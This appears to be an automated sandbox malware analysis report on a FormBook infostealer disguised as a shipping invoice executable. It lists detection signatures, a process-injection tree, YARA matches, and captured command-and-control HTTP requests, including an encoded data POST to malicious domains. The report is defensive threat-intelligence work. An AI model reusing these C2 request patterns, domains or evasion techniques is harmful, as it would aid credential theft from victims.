Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INVOICE, PACKING LIST, COPY BL.exe

Overview

General Information

Sample name:INVOICE, PACKING LIST, COPY BL.exe
Analysis ID:1595905
MD5:d99a197ff2ab116a27ebc2f9f5cb9621
SHA1:3f0432535936a6ba7f8f59165955fd5a80a1fbac
SHA256:a91e52d4bedcc2c8114e3f2ddb80908c4abb92b0838689a14818494009088b95
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • INVOICE, PACKING LIST, COPY BL.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe" MD5: D99A197FF2AB116A27EBC2F9F5CB9621)
    • INVOICE, PACKING LIST, COPY BL.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe" MD5: D99A197FF2AB116A27EBC2F9F5CB9621)
      • 2zqVCuEmR.exe (PID: 5360 cmdline: "C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\Ecsr5MF5B.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • secinit.exe (PID: 7980 cmdline: "C:\Windows\SysWOW64\secinit.exe" MD5: 3B4B8DB765C75B8024A208AE6915223C)
          • 2zqVCuEmR.exe (PID: 7128 cmdline: "C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\jbvjh2XSnh6aHF.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7352 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1753952129.0000000003750000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.2643396170.00000000030B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.1752858443.00000000014E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.1752372159.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.2643246476.0000000003060000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: INVOICE, PACKING LIST, COPY BL.exeAvira: detected
                Multi AV Scanner detection for submitted file
                Source: INVOICE, PACKING LIST, COPY BL.exeReversingLabs: Detection: 47%
                Source: INVOICE, PACKING LIST, COPY BL.exeVirustotal: Detection: 32%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.INVOICE, PACKING LIST, COPY BL.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1753952129.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2643396170.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1752858443.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1752372159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2643246476.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2641361851.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2643029007.0000000004E20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2645828359.0000000004D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: INVOICE, PACKING LIST, COPY BL.exeJoe Sandbox ML: detected
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: INVOICE, PACKING LIST, COPY BL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: secinit.pdbGCTL source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752656882.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000002.2642194522.000000000155E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752989038.0000000001600000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1752868899.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.0000000003210000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1756481965.0000000003064000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: INVOICE, PACKING LIST, COPY BL.exe, INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752989038.0000000001600000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, secinit.exe, 00000006.00000003.1752868899.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.2643722597.0000000003210000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 00000006.00000003.1756481965.0000000003064000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: secinit.pdb source: INVOICE, PACKING LIST, COPY BL.exe, 00000003.00000002.1752656882.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 2zqVCuEmR.exe, 00000005.00000002.2642194522.000000000155E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 2zqVCuEmR.exe, 00000005.00000002.2641515194.0000000000E2F000.00000002.00000001.01000000.0000000C.sdmp, 2zqVCuEmR.exe, 00000007.00000002.2643227394.0000000000E2F000.00000002.00000001.01000000.0000000C.sdmp
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ADC750 FindFirstFileW,FindNextFileW,FindClose,6_2_02ADC750
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 4x nop then xor eax, eax6_2_02AC9EA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 4x nop then mov ebx, 00000004h6_2_035604E8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.physicsbrain.xyz
                Source: DNS query: www.autonomousrich.xyz
                Source: Joe Sandbox ViewIP Address: 192.64.118.221 192.64.118.221
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /i9o2/?lD28M=8NMLjrEX&o8I=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lmJ9SS7h7GpbOR0Ih6QylNPIlDDPXgKAPXKjWtP8cuJHPWQ== HTTP/1.1Host: www.physicsbrain.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /s3u9/?o8I=UzjCSVSddvdCY8C2KpgECGgzR3gby2SVeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEsPEdOrzND6qrSzk1cnsXMxQ/Woon90MFrB7EZZ9A9paTig==&lD28M=8NMLjrEX HTTP/1.1Host: www.bydotoparca.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /sps0/?o8I=XJrqUIwA9BqFEGe4zPJcFFH+FWeIVG8ka5W/N1g8G7k0/aUxIXiyzXPqBkPj84XroFellg4Bg0NpGuCwGUgLHVI0emb0fq3SPjbmnsy01DHgj+3XsA+9UNATNHrkVJu7Rw==&lD28M=8NMLjrEX HTTP/1.1Host: www.car-select.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /g9qz/?o8I=J9sRrZ4fqsb/1Q6AIA+8pauKL/kc/YnlctC80LIvBLslcKLdVtpBX2y3nBvKVl1xysCjrJ6Q3kV9G4g20t4jVg6G/hudG0nqqZ6hYWzTP4BH7K0jhDAwFujk6Ut9TYQuCA==&lD28M=8NMLjrEX HTTP/1.1Host: www.topked.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /5l58/?lD28M=8NMLjrEX&o8I=mzKLqUgWNSOc0HClXj1DYw25iXyF4NDDzKLO7iktqSi1e8VIoGhrLQ80YJoT2UJy6ZdaxC2wU3x58VDwsjwy75MJV3VtnNq0OSNjen8RmThW2Bit8HxG0xB8ZqPFXeAi4g== HTTP/1.1Host: www.autonomousrich.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficHTTP traffic detected: GET /eee1/?o8I=n9kO9VSsPKocZxga8wMP7ZC/yNhYo/MYHbvIjRRvOevNyFmmshV66n7ll9r5u+VXxmlOglvHHE9+Zbjf/X+X+gqcpnFv5fdVnQSXxkRXfk4Q5CwHoK9c2oYwmaFtGgt8pA==&lD28M=8NMLjrEX HTTP/1.1Host: www.corellia.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)
                Source: global trafficDNS traffic detected: DNS query: www.physicsbrain.xyz
                Source: global trafficDNS traffic detected: DNS query: www.bydotoparca.net
                Source: global trafficDNS traffic detected: DNS query: www.car-select.online
                Source: global trafficDNS traffic detected: DNS query: www.topked.top
                Source: global trafficDNS traffic detected: DNS query: www.autonomousrich.xyz
                Source: global trafficDNS traffic detected: DNS query: www.corellia.pro
                Source: unknownHTTP traffic detected: POST /s3u9/ HTTP/1.1Host: www.bydotoparca.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USOrigin: http://www.bydotoparca.netCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 204Connection: closeReferer: http://www.bydotoparca.net/s3u9/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MASMJS)Data Raw: 6f 38 49 3d 5a 78 4c 69 52 69 71 6e 65 39 4a 77 4b 35 57 2b 49 4a 4d 6d 46 46 6c 79 57 6a 49 45 79 68 36 64 53 57 2b 6c 35 72 51 6f 6a 48 76 62 64 50 2f 6a 6e 2f 57 59 75 72 2b 54 68 32 38 78 53 79 2b 67 76 67 6f 53 71 61 72 68 67 49 51 6a 42 55 79 35 42 6f 66 53 6e 39 6f 73 4a 35 36 52 49 2f 4f 4a 51 51 63 58 65 56 64 43 61 41 55 49 58 49 78 50 37 31 73 55 32 6e 37 62 4b 61 70 72 32 5a 44 30 30 6a 6c 6b 49 68 59 42 56 46 75 2f 68 54 52 34 79 57 75 42 73 38 35 59 50 34 6b 7a 34 52 50 41 6d 4c 79 36 75 36 78 6f 66 58 79 4d 45 47 49 6c 52 7a 2f 4c 72 36 36 71 72 54 42 6c 4c 45 41 37 68 66 67 41 41 52 45 3d Data Ascii: o8I=ZxLiRiqne9JwK5W+IJMmFFlyWjIEyh6dSW+l5rQojHvbdP/jn/WYur+Th28xSy+gvgoSqarhgIQjBUy5BofSn9osJ56RI/OJQQcXeVdCaAUIXIxP71sU2n7bKapr2ZD00jlkIhYBVFu/hTR4yWuBs85YP4kz4RPAmLy6u6xofXyMEGIlRz/Lr66qrTBlLEA7hfgAARE=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 21 Jan 2025 12:26:13 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-21T12:26:18.7550837Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:26:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:26:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:26:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Jan 2025 12:26:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:26:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:26:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 12:26:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 